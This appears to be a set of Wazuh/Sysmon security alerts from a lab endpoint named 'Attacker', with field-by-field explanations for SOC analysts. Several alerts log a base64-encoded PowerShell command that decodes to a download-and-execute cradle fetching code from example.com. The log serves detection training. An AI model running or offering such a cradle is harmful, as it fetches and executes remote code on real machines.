agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534220.1118230
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:13.7009783Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282643
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:13.637 ProcessGuid: {94294ddc-bcdc-680a-d60a-000000000e00} ProcessId: 8684 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_wxd2cw3n.5ae.ps1 CreationUtcTime: 2025-04-24 22:36:13.634 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:13.637
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcdc-680a-d60a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8684
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wxd2cw3n.5ae.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:13.634
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:01.022+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:01.022+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  28
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534221.1120995
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:15.7536912Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282677
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:14.714 ProcessGuid: {94294ddc-bcde-680a-d90a-000000000e00} ProcessId: 11988 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcdc-680a-d60a-000000000e00} ParentProcessId: 8684 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:14.714
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcde-680a-d90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11988
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcdc-680a-d60a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8684
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:01.037+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:01.037+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  32
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534221.1129062
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:15.9842219Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282678
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:15.968 ProcessGuid: {94294ddc-bcde-680a-d90a-000000000e00} ProcessId: 11988 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_blnnlgfs.rwq.ps1 CreationUtcTime: 2025-04-24 22:36:15.968 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:15.968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcde-680a-d90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11988
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_blnnlgfs.rwq.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:15.968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:01.563+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:01.563+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  29
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534221.1131831
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:19.7512986Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282717
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:17.032 ProcessGuid: {94294ddc-bce1-680a-dc0a-000000000e00} ProcessId: 12012 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcde-680a-d90a-000000000e00} ParentProcessId: 11988 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:17.032
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bce1-680a-dc0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12012
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcde-680a-d90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11988
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:01.579+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:01.579+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  33
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534221.1139902
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

